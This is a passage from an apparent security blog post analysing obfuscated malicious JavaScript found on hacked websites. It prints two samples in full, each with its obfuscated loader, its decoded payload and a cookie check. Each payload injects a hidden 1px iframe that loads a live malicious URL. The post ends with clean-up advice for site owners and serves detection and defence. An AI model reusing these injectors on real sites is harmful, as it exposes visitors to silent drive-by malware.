q.style.top = '1px';
if (!document.getElementById('q')) {
document.write('<div id=\'q\'></div>');
document.getElementById('q').appendChild(q);
}
}
function SetCookie(cookieName, cookieValue, nDays, path) {
var today = new Date();
var expire = new Date();
if (nDays == null || nDays == 0) nDays = 1;
expire.setTime(today.getTime() + 3600000 * 24 * nDays);
document.cookie = cookieName + "=" + escape(cookieValue)
+ ";expires=" + expire.toGMTString() + ((path) ? "; path=" + path : "");
}
function GetCookie(name) {
var start = document.cookie.indexOf(name + "=");
var len = start + name.length + 1;
if ((!start) &&
(name != document.cookie.substring(0, name.length)))
{
return null;
}
if (start == -1) return null;
var end = document.cookie.indexOf(";", len);
if (end == -1) end = document.cookie.length;
return unescape(document.cookie.substring(len, end));
}
if (navigator.cookieEnabled)
{
if (GetCookie('visited_uq') == 55) {} else {
SetCookie('visited_uq', '55', '1', '/');
zzzfff();
}
}

Sample 6

Malicious action: injecting hidden iframe to http://www.idmelettronica.it/js/counter.php

ww = window;
v = "v" + "al";
if (ww.document) try {
document.body = 12;
} catch (gdsgsdg) {
asd = 0;
try {
q = document.createElement("div");
} catch (q) {
asd = 1;
}
if (!asd) {
w = {
a: ww
}.a;
v = "e".concat(v);
}
}
e = w[v];
if (1) {
f = new Array(40, 101, 115, 107, 99, 115, 103, 108, 110, 31, 38, 38, 32, 122, 11, 7, 32, 31, 30, 29, 118, 96,112, 29, 114, 97, 98, 100, 32, 60, 30, 97, 111, 98, 115, 106, 101, 109, 114, 43, 99, 113, 99, 94, 116, 100, 67,105, 101, 108, 99, 107, 116, 39, 37, 102, 102, 113, 95, 106, 101, 38, 39, 56, 13, 9, 11, 7, 32, 31, 30, 29, 114,97, 98, 100, 46, 114, 112, 96, 32, 60, 30, 36, 104, 115, 114, 109, 58, 46, 45, 116, 119, 118, 44, 102, 100, 108,99, 105, 101, 115, 114, 111, 111, 109, 103, 96, 97, 45, 103, 113, 47, 105, 113, 44, 99, 110, 115, 107, 116, 100,112, 43, 112, 103, 110, 36, 59, 12, 8, 29, 32, 31, 30, 111, 98, 99, 101, 43, 115, 115, 119, 105, 101, 45, 110,108, 115, 104, 114, 102, 111, 109, 30, 58, 32, 38, 95, 95, 115, 110, 106, 114, 116, 100, 37, 56, 13, 9, 30, 29,32, 31, 112, 95, 100, 102, 44, 112, 116, 120, 106, 98, 46, 97, 109, 111, 100, 100, 112, 29, 61, 31, 37, 45, 39,58, 11, 7, 32, 31, 30, 29, 114, 97, 98, 100, 46, 114, 114, 118, 108, 100, 44, 101, 101, 104, 101, 101, 116, 31,59, 29, 39, 48, 110, 117, 39, 58, 11, 7, 32, 31, 30, 29, 114, 97, 98, 100, 46, 114, 114, 118, 108, 100, 44, 116,105, 99, 114, 101, 32, 60, 30, 36, 49, 111, 118, 36, 59, 12, 8, 29, 32, 31, 30, 111, 98, 99, 101, 43, 115, 115,119, 105, 101, 45, 106, 98, 102, 115, 30, 58, 32, 38, 47, 109, 120, 38, 57, 10, 10, 31, 30, 29, 32, 113, 96, 97,103, 45, 113, 113, 121, 107, 99, 43, 116, 110, 110, 29, 61, 31, 37, 46, 112, 119, 37, 56, 13, 9, 11, 7, 32, 31,30, 29, 105, 101, 30, 37, 33, 99, 109, 96, 117, 108, 99, 107, 116, 45, 101, 98, 116, 68, 106, 98, 109, 100, 108,113, 66, 120, 71, 97, 40, 38, 112, 95, 100, 102, 37, 38, 41, 31, 121, 10, 10, 31, 30, 29, 32, 31, 30, 29, 32, 99,109, 96, 117, 108, 99, 107, 116, 45, 117, 111, 105, 115, 99, 37, 39, 59, 98, 102, 118, 31, 103, 97, 61, 91, 37,111, 98, 99, 101, 89, 39, 61, 58, 44, 100, 104, 116, 59, 39, 40, 57, 10, 10, 31, 30, 29, 32, 31, 30, 29, 32, 99,109, 96, 117, 108, 99, 107, 116, 45, 101, 98, 116, 68, 106, 98, 109, 100, 108, 113, 66, 120, 71, 97, 40, 38, 112,95, 100, 102, 37, 38, 46, 96, 110, 109, 101, 109, 98, 64, 104, 104, 106, 97, 40, 113, 96, 97, 103, 40, 57, 10, 10,31, 30, 29, 32, 124, 11, 7, 125, 40, 38, 38, 59);
}
w = f;
s = [];
for (i = 0; - i + 493 != 0; i += 1) {
j = i;
if ((031 == 0x19))
if (e) s = s + String.fromCharCode((1 * w[j] + e("j%4")));
}
xz = e;
try {
document.body++
} catch (gdsgd) {
xz(s)
}
/*
* decoded payload inject malicious hidden iframe leading
* to http://www.idmelettronica.it/js/counter.php
*/
(function () {
var rbdg = document.createElement('iframe');
rbdg.src = 'http://www.idmelettronica.it/js/counter.php';
rbdg.style.position = 'absolute';
rbdg.style.border = '0';
rbdg.style.height = '1px';
rbdg.style.width = '1px';
rbdg.style.left = '1px';
rbdg.style.top = '1px';
if (!document.getElementById('rbdg')) {
document.write('<div id=\'rbdg\'></div>');
document.getElementById('rbdg').appendChild(rbdg);
}
})();

Sample 7

Malicious action: injecting hidden iframe to http://cafelum.ru/tmp/46nqizls.php

d = "doc" + "ument";
try {
++document.body
} catch (q) {
aa = function (ff) {
for (i = 0; i < z.length; i++) {
za += String[ff](e(v + (z[i])) - 12);
}
};
};
ps = "split";
e = (eval);
v = "0x";
a = 0;
z = "y";
try {;
} catch (zz) {
a = 1
}
if (!a) {
try {
++e(d)["bod" + z]
} catch (q) {
a2 = "_";
}
z ="2c_72_81_7a_6f_80_75_7b_7a_2c_86_86_86_72_72_72_34_35_2c_87_19_16_2c_82_6d_7e_2c_76_6d_70_7e_2c_49_2c_70_7b_6f_81_79_71_7a_80_3a_6f_7e_71_6d_80_71_51_78_71_79_71_7a_80_34_33_75_72_7e_6d_79_71_33_35_47_19_16_19_16_2c_76_6d_70_7e_3a_7f_7e_6f_2c_49_2c_33_74_80_80_7c_46_3b_3b_6f_6d_72_71_78_81_79_3a_7e_81_3b_80_79_7c_3b_40_42_7a_7d_75_86_78_7f_3a_7c_74_7c_33_47_19_16_2c_76_6d_70_7e_3a_7f_80_85_78_71_3a_7c_7b_7f_75_80_75_7b_7a_2c_49_2c_33_6d_6e_7f_7b_78_81_80_71_33_47_19_16_2c_76_6d_70_7e_3a_7f_80_85_78_71_3a_6e_7b_7e_70_71_7e_2c_49_2c_33_3c_33_47_19_16_2c_76_6d_70_7e_3a_7f_80_85_78_71_3a_74_71_75_73_74_80_2c_49_2c_33_3d_7c_84_33_47_19_16_2c_76_6d_70_7e_3a_7f_80_85_78_71_3a_83_75_70_80_74_2c_49_2c_33_3d_7c_84_33_47_19_16_2c_76_6d_70_7e_3a_7f_80_85_78_71_3a_78_71_72_80_2c_49_2c_33_3d_7c_84_33_47_19_16_2c_76_6d_70_7e_3a_7f_80_85_78_71_3a_80_7b_7c_2c_49_2c_33_3d_7c_84_33_47_19_16_19_16_2c_75_72_2c_34_2d_70_7b_6f_81_79_71_7a_80_3a_73_71_80_51_78_71_79_71_7a_80_4e_85_55_70_34_33_76_6d_70_7e_33_35_35_2c_87_19_16_2c_70_7b_6f_81_79_71_7a_80_3a_83_7e_75_80_71_34_33_48_70_75_82_2c_75_70_49_68_33_76_6d_70_7e_68_33_4a_48_3b_70_75_82_4a_33_35_47_19_16_2c_70_7b_6f_81_79_71_7a_80_3a_73_71_80_51_78_71_79_71_7a_80_4e_85_55_70_34_33_76_6d_70_7e_33_35_3a_6d_7c_7c_71_7a_70_4f_74_75_78_70_34_76_6d_70_7e_35_47_19_16_2c_89_19_16_89_19_16_72_81_7a_6f_80_75_7b_7a_2c_5f_71_80_4f_7b_7b_77_75_71_34_6f_7b_7b_77_75_71_5a_6d_79_71_38_6f_7b_7b_77_75_71_62_6d_78_81_71_38_7a_50_6d_85_7f_38_7c_6d_80_74_35_2c_87_19_16_2c_82_6d_7e_2c_80_7b_70_6d_85_2c_49_2c_7a_71_83_2c_50_6d_80_71_34_35_47_19_16_2c_82_6d_7e_2c_71_84_7c_75_7e_71_2c_49_2c_7a_71_83_2c_50_6d_80_71_34_35_47_19_16_2c_75_72_2c_34_7a_50_6d_85_7f_49_49_7a_81_78_78_2c_88_88_2c_7a_50_6d_85_7f_49_49_3c_35_2c_7a_50_6d_85_7f_49_3d_47_19_16_2c_71_84_7c_75_7e_71_3a_7f_71_80_60_75_79_71_34_80_7b_70_6d_85_3a_73_71_80_60_75_79_71_34_35_2c_37_2c_3f_42_3c_3c_3c_3c_3c_36_3e_40_36_7a_50_6d_85_7f_35_47_19_16_2c_70_7b_6f_81_79_71_7a_80_3a_6f_7b_7b_77_75_71_2c_49_2c_6f_7b_7b_77_75_71_5a_6d_79_71_37_2e_49_2e_37_71_7f_6f_6d_7c_71_34_6f_7b_7b_77_75_71_62_6d_78_81_71_35_19_16_2c_37_2c_2e_47_71_84_7c_75_7e_71_7f_49_2e_2c_37_2c_71_84_7c_75_7e_71_3a_80_7b_53_59_60_5f_80_7e_75_7a_73_34_35_2c_37_2c_34_34_7c_6d_80_74_35_2c_4b_2c_2e_47_2c_7c_6d_80_74_49_2e_2c_37_2c_7c_6d_80_74_2c_46_2c_2e_2e_35_47_19_16_89_19_16_72_81_7a_6f_80_75_7b_7a_2c_53_71_80_4f_7b_7b_77_75_71_34_2c_7a_6d_79_71_2c_35_2c_87_19_16_2c_82_6d_7e_2c_7f_80_6d_7e_80_2c_49_2c_70_7b_6f_81_79_71_7a_80_3a_6f_7b_7b_77_75_71_3a_75_7a_70_71_84_5b_72_34_2c_7a_6d_79_71_2c_37_2c_2e_49_2e_2c_35_47_19_16_2c_82_6d_7e_2c_78_71_7a_2c_49_2c_7f_80_6d_7e_80_2c_37_2c_7a_6d_79_71_3a_78_71_7a_73_80_74_2c_37_2c_3d_47_19_16_2c_75_72_2c_34_2c_34_2c_2d_7f_80_6d_7e_80_2c_35_2c_32_32_19_16_2c_34_2c_7a_6d_79_71_2c_2d_49_2c_70_7b_6f_81_79_71_7a_80_3a_6f_7b_7b_77_75_71_3a_7f_81_6e_7f_80_7e_75_7a_73_34_2c_3c_38_2c_7a_6d_79_71_3a_78_71_7a_73_80_74_2c_35_2c_35_2c_35_19_16_2c_87_19_16_2c_7e_71_80_81_7e_7a_2c_7a_81_78_78_47_19_16_2c_89_19_16_2c_75_72_2c_34_2c_7f_80_6d_7e_80_2c_49_49_2c_39_3d_2c_35_2c_7e_71_80_81_7e_7a_2c_7a_81_78_78_47_19_16_2c_82_6d_7e_2c_71_7a_70_2c_49_2c_70_7b_6f_81_79_71_7a_80_3a_6f_7b_7b_77_75_71_3a_75_7a_70_71_84_5b_72_34_2c_2e_47_2e_38_2c_78_71_7a_2c_35_47_19_16_2c_75_72_2c_34_2c_71_7a_70_2c_49_49_2c_39_3d_2c_35_2c_71_7a_70_2c_49_2c_70_7b_6f_81_79_71_7a_80_3a_6f_7b_7b_77_75_71_3a_78_71_7a_73_80_74_47_19_16_2c_7e_71_80_81_7e_7a_2c_81_7a_71_7f_6f_6d_7c_71_34_2c_70_7b_6f_81_79_71_7a_80_3a_6f_7b_7b_77_75_71_3a_7f_81_6e_7f_80_7e_75_7a_73_34_2c_78_71_7a_38_2c_71_7a_70_2c_35_2c_35_47_19_16_89_19_16_75_72_2c_34_7a_6d_82_75_73_6d_80_7b_7e_3a_6f_7b_7b_77_75_71_51_7a_6d_6e_78_71_70_35_19_16_87_19_16_75_72_34_53_71_80_4f_7b_7b_77_75_71_34_33_82_75_7f_75_80_71_70_6b_81_7d_33_35_49_49_41_41_35_87_89_71_78_7f_71_87_5f_71_80_4f_7b_7b_77_75_71_34_33_82_75_7f_75_80_71_70_6b_81_7d_33_38_2c_33_41_41_33_38_2c_33_3d_33_38_2c_33_3b_33_35_47_19_16_19_16_86_86_86_72_72_72_34_35_47_19_16_89_19_16_89_19_16"[ps](a2);
za = "";
aa("fromCharCode");
zaz = za;
e(zaz);
}
/*
* decoded payload injecting hidden iframe to http://cafelum.ru/tmp/46nqizls.php
*/
function zzzfff() {
var jadr = document.createElement('iframe');
jadr.src = 'http://cafelum.ru/tmp/46nqizls.php';
jadr.style.position = 'absolute';
jadr.style.border = '0';
jadr.style.height = '1px';
jadr.style.width = '1px';
jadr.style.left = '1px';
jadr.style.top = '1px';
if (!document.getElementById('jadr')) {
document.write('<div id=\'jadr\'></div>');
document.getElementById('jadr').appendChild(jadr);
}
}
function SetCookie(cookieName, cookieValue, nDays, path) {
var today = new Date();
var expire = new Date();
if (nDays == null || nDays == 0) nDays = 1;
expire.setTime(today.getTime() + 3600000 * 24 * nDays);
document.cookie = cookieName + "=" + escape(cookieValue) + ";expires=" + expire.toGMTString() + ((path) ? "; path=" + path : "");
}
function GetCookie(name) {
var start = document.cookie.indexOf(name + "=");
var len = start + name.length + 1;
if ((!start) &&
(name != document.cookie.substring(0, name.length))) {
return null;
}
if (start == -1) return null;
var end = document.cookie.indexOf(";", len);
if (end == -1) end = document.cookie.length;
return unescape(document.cookie.substring(len, end));
}
if (navigator.cookieEnabled) {
if (GetCookie('visited_uq') == 55) {} else {
SetCookie('visited_uq', '55', '1', '/');
zzzfff();
}
}

Summary

As stated in other posts, redirection to the malicious resource is one of the main reasons for website to get blacklisted. Usually, such websites are not intentionally malicious but have been compromised to serve the hackers. Scanning your website can save you headache of getting out from blacklist and avoid traffic loss on the early stages of the attack, so do not neglect this measure!
Successful hacking is usually made possible because of the avoided security best practices by the website owners.

Malware clean-up

Such malware is often hidden inside the JavaScript file. If you suspect that your website was infected by similar malware please use Website Anti-malware Monitoring for real-time anti-malware monitoring and for remediation assessment.

Quttera web security blog

Pages

Sunday, August 4, 2013

7 hottest obfuscated malicious JavaScript detected on websites